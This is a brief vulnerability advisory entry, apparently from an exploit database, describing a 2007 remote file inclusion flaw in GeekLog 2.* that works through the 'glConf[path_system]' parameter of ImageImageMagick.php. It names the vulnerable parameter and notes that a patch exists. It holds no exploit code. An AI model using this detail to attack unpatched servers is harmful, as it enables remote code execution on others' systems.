vendor:
GeekLog
by:
rgod
7.5
CVSS
HIGH
Remote File Inclusion (RFI)
CWE
Product Name: GeekLog
Affected Version From: GeekLog 2.*
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Platforms Tested:
2007
GeekLog 2.* (ImageImageMagick.php) RFI Vuln
The vulnerability allows an attacker to include a remote file in the system's ImageImageMagick.php file. By manipulating the 'glConf[path_system]' parameter, an attacker can specify a malicious file hosted on a remote server to be executed on the target system.
Mitigation:
The vendor has released a patch to fix this vulnerability. Users are advised to update to the latest version of GeekLog.